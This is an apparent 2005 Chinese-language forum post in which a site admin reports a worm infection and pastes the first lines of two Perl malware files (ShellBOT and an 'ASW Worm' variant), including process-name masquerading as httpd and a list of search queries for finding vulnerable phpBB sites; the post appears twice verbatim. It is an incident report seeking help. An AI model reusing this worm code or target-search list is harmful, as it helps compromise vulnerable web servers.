[問題] 近日各位的Server是否有遭受worm攻擊
發表於 : 2005-02-08 14:59
phpBB 的官方網站已經暫時關閉了 , http://www.phpbb.com
昨日弟的網站也遭受攻擊, 在 tmp 下被放入 31337 , 31338 還有 .hitler 等檔案
31338 內容標頭為
#!/usr/bin/perl
#
# ShellBOT
# 0ldW0lf - old-wolf@zipmail.com
# - http://www.atrix-br.cjb.net
# - http://www.atrix.cjb.net
31337 內容前幾行為\r
# ASW Worm Modification ! by br0k3d@gmail.com ! #
# 4nd Version ! f**k google !
use strict;
use IO::Socket;
use IO::Handle;
\r
#Ripado do b0t.pl
my $processo = '/usr/sbin/httpd';
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
#Fim da ripagem
sub fetch();
sub remote($);
sub http_query($);
sub encode($);
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 50;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
my @str=("powered+-modules++topic+%22by+phpBB+2.0.4%22+",
"view+edit+posts+-modules+-ultimatebb.php+-showthread.php+",
"powered+-modules++topic+%22by+phpBB+2.0.6%22+",
"powered+-modules++topic+%22by+phpBB+2.0.8%22",
"post+-modules+topic+forum%7CphpBB+",
"view+topic+-modules+%22+",
"viewtopic%7CphpBB+-modules+.php+",
"viewtopic+.php+-modules+",
);
因此初步懷疑跟 phpBB 有關..
我已經更新為最新的 2.0.11 了...
有沒有人也有類似經驗呀...
昨日弟的網站也遭受攻擊, 在 tmp 下被放入 31337 , 31338 還有 .hitler 等檔案
31338 內容標頭為
#!/usr/bin/perl
#
# ShellBOT
# 0ldW0lf - old-wolf@zipmail.com
# - http://www.atrix-br.cjb.net
# - http://www.atrix.cjb.net
31337 內容前幾行為\r
# ASW Worm Modification ! by br0k3d@gmail.com ! #
# 4nd Version ! f**k google !
use strict;
use IO::Socket;
use IO::Handle;
\r
#Ripado do b0t.pl
my $processo = '/usr/sbin/httpd';
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
#Fim da ripagem
sub fetch();
sub remote($);
sub http_query($);
sub encode($);
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 50;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
my @str=("powered+-modules++topic+%22by+phpBB+2.0.4%22+",
"view+edit+posts+-modules+-ultimatebb.php+-showthread.php+",
"powered+-modules++topic+%22by+phpBB+2.0.6%22+",
"powered+-modules++topic+%22by+phpBB+2.0.8%22",
"post+-modules+topic+forum%7CphpBB+",
"view+topic+-modules+%22+",
"viewtopic%7CphpBB+-modules+.php+",
"viewtopic+.php+-modules+",
);
因此初步懷疑跟 phpBB 有關..
我已經更新為最新的 2.0.11 了...
有沒有人也有類似經驗呀...